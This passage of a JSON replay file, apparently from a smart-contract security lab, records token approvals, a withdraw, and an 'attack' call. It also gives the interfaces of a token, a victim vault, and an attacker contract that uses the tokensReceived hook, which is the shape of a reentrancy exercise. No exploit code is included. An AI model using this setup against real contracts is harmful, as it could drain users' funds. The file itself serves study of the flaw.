"function", 134 | "from": "account{0}" 135 | } 136 | }, 137 | { 138 | "timestamp": 1650474905672, 139 | "record": { 140 | "value": "0", 141 | "parameters": [ 142 | "0x5B38Da6a701c568545dCfcB03FcB875f56beddC4" 143 | ], 144 | "to": "created{1650474395581}", 145 | "abi": "0xa394c22e641004cf0bd13bef73528d4f470423a89cad1d16a32bd32435267d4e", 146 | "name": "withdraw", 147 | "inputs": "(address)", 148 | "type": "function", 149 | "from": "account{0}" 150 | } 151 | }, 152 | { 153 | "timestamp": 1650474953826, 154 | "record": { 155 | "value": "0", 156 | "parameters": [ 157 | "created{1650474395581}", 158 | "5000000000000000000" 159 | ], 160 | "to": "created{1650474338320}", 161 | "abi": "0x3e91d4a4cb3d9af06253d1e2a6db8ea31b4981cfbf80b7c1a367ad75e462ea98", 162 | "name": "approve", 163 | "inputs": "(address,uint256)", 164 | "type": "function", 165 | "from": "account{1}" 166 | } 167 | }, 168 | { 169 | "timestamp": 1650474972462, 170 | "record": { 171 | "value": "0", 172 | "parameters": [ 173 | "created{1650474514599}", 174 | "5000000000000000000" 175 | ], 176 | "to": "created{1650474338320}", 177 | "abi": "0x3e91d4a4cb3d9af06253d1e2a6db8ea31b4981cfbf80b7c1a367ad75e462ea98", 178 | "name": "approve", 179 | "inputs": "(address,uint256)", 180 | "type": "function", 181 | "from": "account{1}" 182 | } 183 | }, 184 | { 185 | "timestamp": 1650474993403, 186 | "record": { 187 | "value": "0", 188 | "parameters": [ 189 | "5000000000000000000" 190 | ], 191 | "to": "created{1650474514599}", 192 | "abi": "0xeaf12dbffab8e47aa1b27e4e9d838ee0b6048bf42f57fc6134a598bc42bfc5bd", 193 | "name": "attack", 194 | "inputs": "(uint256)", 195 | "type": "function", 196 | "from": "account{1}" 197 | } 198 | } 199 | ], 200 | "abis": { 201 | "0x3e91d4a4cb3d9af06253d1e2a6db8ea31b4981cfbf80b7c1a367ad75e462ea98": [ 202 | { 203 | "inputs": [ 204 | { 205 | "internalType": "uint256", 206 | "name": "initialSupply", 207 | "type": "uint256" 208 | } 209 | ], 210 | "stateMutability": "nonpayable", 211 | "type": 
"constructor" 212 | }, 213 | { 214 | "anonymous": false, 215 | "inputs": [ 216 | { 217 | "indexed": true, 218 | "internalType": "address", 219 | "name": "owner", 220 | "type": "address" 221 | }, 222 | { 223 | "indexed": true, 224 | "internalType": "address", 225 | "name": "spender", 226 | "type": "address" 227 | }, 228 | { 229 | "indexed": false, 230 | "internalType": "uint256", 231 | "name": "value", 232 | "type": "uint256" 233 | } 234 | ], 235 | "name": "Approval", 236 | "type": "event" 237 | }, 238 | { 239 | "inputs": [ 240 | { 241 | "internalType": "address", 242 | "name": "spender", 243 | "type": "address" 244 | }, 245 | { 246 | "internalType": "uint256", 247 | "name": "amount", 248 | "type": "uint256" 249 | } 250 | ], 251 | "name": "approve", 252 | "outputs": [ 253 | { 254 | "internalType": "bool", 255 | "name": "", 256 | "type": "bool" 257 | } 258 | ], 259 | "stateMutability": "nonpayable", 260 | "type": "function" 261 | }, 262 | { 263 | "inputs": [ 264 | { 265 | "internalType": "address", 266 | "name": "to", 267 | "type": "address" 268 | } 269 | ], 270 | "name": "buy", 271 | "outputs": [], 272 | "stateMutability": "payable", 273 | "type": "function" 274 | }, 275 | { 276 | "inputs": [ 277 | { 278 | "internalType": "address", 279 | "name": "spender", 280 | "type": "address" 281 | }, 282 | { 283 | "internalType": "uint256", 284 | "name": "subtractedValue", 285 | "type": "uint256" 286 | } 287 | ], 288 | "name": "decreaseAllowance", 289 | "outputs": [ 290 | { 291 | "internalType": "bool", 292 | "name": "", 293 | "type": "bool" 294 | } 295 | ], 296 | "stateMutability": "nonpayable", 297 | "type": "function" 298 | }, 299 | { 300 | "inputs": [ 301 | { 302 | "internalType": "address", 303 | "name": "spender", 304 | "type": "address" 305 | }, 306 | { 307 | "internalType": "uint256", 308 | "name": "addedValue", 309 | "type": "uint256" 310 | } 311 | ], 312 | "name": "increaseAllowance", 313 | "outputs": [ 314 | { 315 | "internalType": "bool", 316 | "name": "", 317 | 
"type": "bool" 318 | } 319 | ], 320 | "stateMutability": "nonpayable", 321 | "type": "function" 322 | }, 323 | { 324 | "inputs": [ 325 | { 326 | "internalType": "address", 327 | "name": "_to", 328 | "type": "address" 329 | }, 330 | { 331 | "internalType": "uint256", 332 | "name": "_value", 333 | "type": "uint256" 334 | } 335 | ], 336 | "name": "transfer", 337 | "outputs": [ 338 | { 339 | "internalType": "bool", 340 | "name": "", 341 | "type": "bool" 342 | } 343 | ], 344 | "stateMutability": "nonpayable", 345 | "type": "function" 346 | }, 347 | { 348 | "anonymous": false, 349 | "inputs": [ 350 | { 351 | "indexed": true, 352 | "internalType": "address", 353 | "name": "from", 354 | "type": "address" 355 | }, 356 | { 357 | "indexed": true, 358 | "internalType": "address", 359 | "name": "to", 360 | "type": "address" 361 | }, 362 | { 363 | "indexed": false, 364 | "internalType": "uint256", 365 | "name": "value", 366 | "type": "uint256" 367 | } 368 | ], 369 | "name": "Transfer", 370 | "type": "event" 371 | }, 372 | { 373 | "inputs": [ 374 | { 375 | "internalType": "address", 376 | "name": "_from", 377 | "type": "address" 378 | }, 379 | { 380 | "internalType": "address", 381 | "name": "_to", 382 | "type": "address" 383 | }, 384 | { 385 | "internalType": "uint256", 386 | "name": "_value", 387 | "type": "uint256" 388 | } 389 | ], 390 | "name": "transferFrom", 391 | "outputs": [ 392 | { 393 | "internalType": "bool", 394 | "name": "", 395 | "type": "bool" 396 | } 397 | ], 398 | "stateMutability": "nonpayable", 399 | "type": "function" 400 | }, 401 | { 402 | "inputs": [ 403 | { 404 | "internalType": "address", 405 | "name": "owner", 406 | "type": "address" 407 | }, 408 | { 409 | "internalType": "address", 410 | "name": "spender", 411 | "type": "address" 412 | } 413 | ], 414 | "name": "allowance", 415 | "outputs": [ 416 | { 417 | "internalType": "uint256", 418 | "name": "", 419 | "type": "uint256" 420 | } 421 | ], 422 | "stateMutability": "view", 423 | "type": "function" 424 | 
}, 425 | { 426 | "inputs": [ 427 | { 428 | "internalType": "address", 429 | "name": "account", 430 | "type": "address" 431 | } 432 | ], 433 | "name": "balanceOf", 434 | "outputs": [ 435 | { 436 | "internalType": "uint256", 437 | "name": "", 438 | "type": "uint256" 439 | } 440 | ], 441 | "stateMutability": "view", 442 | "type": "function" 443 | }, 444 | { 445 | "inputs": [], 446 | "name": "decimals", 447 | "outputs": [ 448 | { 449 | "internalType": "uint8", 450 | "name": "", 451 | "type": "uint8" 452 | } 453 | ], 454 | "stateMutability": "view", 455 | "type": "function" 456 | }, 457 | { 458 | "inputs": [], 459 | "name": "name", 460 | "outputs": [ 461 | { 462 | "internalType": "string", 463 | "name": "", 464 | "type": "string" 465 | } 466 | ], 467 | "stateMutability": "view", 468 | "type": "function" 469 | }, 470 | { 471 | "inputs": [], 472 | "name": "symbol", 473 | "outputs": [ 474 | { 475 | "internalType": "string", 476 | "name": "", 477 | "type": "string" 478 | } 479 | ], 480 | "stateMutability": "view", 481 | "type": "function" 482 | }, 483 | { 484 | "inputs": [], 485 | "name": "totalSupply", 486 | "outputs": [ 487 | { 488 | "internalType": "uint256", 489 | "name": "", 490 | "type": "uint256" 491 | } 492 | ], 493 | "stateMutability": "view", 494 | "type": "function" 495 | } 496 | ], 497 | "0xa394c22e641004cf0bd13bef73528d4f470423a89cad1d16a32bd32435267d4e": [ 498 | { 499 | "inputs": [ 500 | { 501 | "internalType": "uint256", 502 | "name": "amount", 503 | "type": "uint256" 504 | } 505 | ], 506 | "name": "deposit", 507 | "outputs": [], 508 | "stateMutability": "nonpayable", 509 | "type": "function" 510 | }, 511 | { 512 | "inputs": [ 513 | { 514 | "internalType": "address", 515 | "name": "operator", 516 | "type": "address" 517 | }, 518 | { 519 | "internalType": "address", 520 | "name": "from", 521 | "type": "address" 522 | }, 523 | { 524 | "internalType": "address", 525 | "name": "to", 526 | "type": "address" 527 | }, 528 | { 529 | "internalType": "uint256", 530 | 
"name": "amount", 531 | "type": "uint256" 532 | }, 533 | { 534 | "internalType": "bytes", 535 | "name": "userData", 536 | "type": "bytes" 537 | }, 538 | { 539 | "internalType": "bytes", 540 | "name": "operatorData", 541 | "type": "bytes" 542 | } 543 | ], 544 | "name": "tokensReceived", 545 | "outputs": [], 546 | "stateMutability": "nonpayable", 547 | "type": "function" 548 | }, 549 | { 550 | "inputs": [ 551 | { 552 | "internalType": "address", 553 | "name": "tokenAddr", 554 | "type": "address" 555 | } 556 | ], 557 | "stateMutability": "nonpayable", 558 | "type": "constructor" 559 | }, 560 | { 561 | "inputs": [ 562 | { 563 | "internalType": "address", 564 | "name": "recipient", 565 | "type": "address" 566 | } 567 | ], 568 | "name": "withdraw", 569 | "outputs": [], 570 | "stateMutability": "nonpayable", 571 | "type": "function" 572 | }, 573 | { 574 | "inputs": [ 575 | { 576 | "internalType": "address", 577 | "name": "", 578 | "type": "address" 579 | } 580 | ], 581 | "name": "amounts", 582 | "outputs": [ 583 | { 584 | "internalType": "uint256", 585 | "name": "", 586 | "type": "uint256" 587 | } 588 | ], 589 | "stateMutability": "view", 590 | "type": "function" 591 | }, 592 | { 593 | "inputs": [], 594 | "name": "token", 595 | "outputs": [ 596 | { 597 | "internalType": "contract IERC20", 598 | "name": "", 599 | "type": "address" 600 | } 601 | ], 602 | "stateMutability": "view", 603 | "type": "function" 604 | } 605 | ], 606 | "0xeaf12dbffab8e47aa1b27e4e9d838ee0b6048bf42f57fc6134a598bc42bfc5bd": [ 607 | { 608 | "inputs": [ 609 | { 610 | "internalType": "uint256", 611 | "name": "amount", 612 | "type": "uint256" 613 | } 614 | ], 615 | "name": "attack", 616 | "outputs": [], 617 | "stateMutability": "nonpayable", 618 | "type": "function" 619 | }, 620 | { 621 | "inputs": [ 622 | { 623 | "internalType": "address", 624 | "name": "", 625 | "type": "address" 626 | }, 627 | { 628 | "internalType": "address", 629 | "name": "from", 630 | "type": "address" 631 | }, 632 | { 633 | 
"internalType": "address", 634 | "name": "", 635 | "type": "address" 636 | }, 637 | { 638 | "internalType": "uint256", 639 | "name": "", 640 | "type": "uint256" 641 | }, 642 | { 643 | "internalType": "bytes", 644 | "name": "", 645 | "type": "bytes" 646 | }, 647 | { 648 | "internalType": "bytes", 649 | "name": "", 650 | "type": "bytes" 651 | } 652 | ], 653 | "name": "tokensReceived", 654 | "outputs": [], 655 | "stateMutability": "nonpayable", 656 | "type": "function" 657 | }, 658 | { 659 | "inputs": [ 660 | { 661 | "internalType": "address", 662 | "name": "victimAddr", 663 | "type": "address" 664 | }, 665 | { 666 | "internalType": "address", 667 | "name": "tokenAddr", 668 | "type": "address" 669 | } 670 | ], 671 | "stateMutability": "nonpayable", 672 | "type": "constructor" 673 | }, 674 | { 675 | "inputs": [], 676 | "name": "token", 677 | "outputs": [ 678 | { 679 | "internalType": "contract IERC20", 680 | "name": "", 681 | "type": "address" 682 | } 683 | ], 684 | "stateMutability": "view", 685 | "type": "function" 686 | }, 687 | { 688 | "inputs": [], 689 | "name": "victim", 690 | "outputs": [ 691 | { 692 | "internalType": "contract IVictim", 693 | "name": "", 694 | "type": "address" 695 | } 696 | ], 697 | "stateMutability": "view", 698 | "type": "function" 699 | } 700 | ] 701 | } 702 | } --------------------------------------------------------------------------------